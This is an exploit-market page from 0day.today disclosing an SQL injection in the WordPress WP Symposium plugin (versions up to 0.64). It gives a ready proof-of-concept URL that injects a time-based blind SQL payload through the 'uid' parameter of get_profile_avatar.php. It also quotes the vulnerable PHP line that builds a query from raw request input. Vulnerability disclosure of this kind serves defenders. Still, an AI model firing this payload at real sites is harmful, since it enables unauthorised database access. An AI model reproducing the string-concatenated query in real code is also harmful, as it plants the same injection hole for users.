[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability

Author
Miroslav Stampar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16707
Category
web applications
Date add
17-08-2011
Platform
php
# Exploit Title: WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-symposium.0.64.zip
# Version: 0.64 (tested)
 
---
PoC
---
http://localhost/wp-content/plugins/wp-symposium/uploadify/get_profile_avatar.php?uid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
---------------
Vulnerable code
---------------
$uid = $_REQUEST['uid'];
$sql = "SELECT profile_avatar FROM ".$wpdb->base_prefix."symposium_usermeta WHERE uid = ".$uid;



#  0day.today [2024-12-25]  #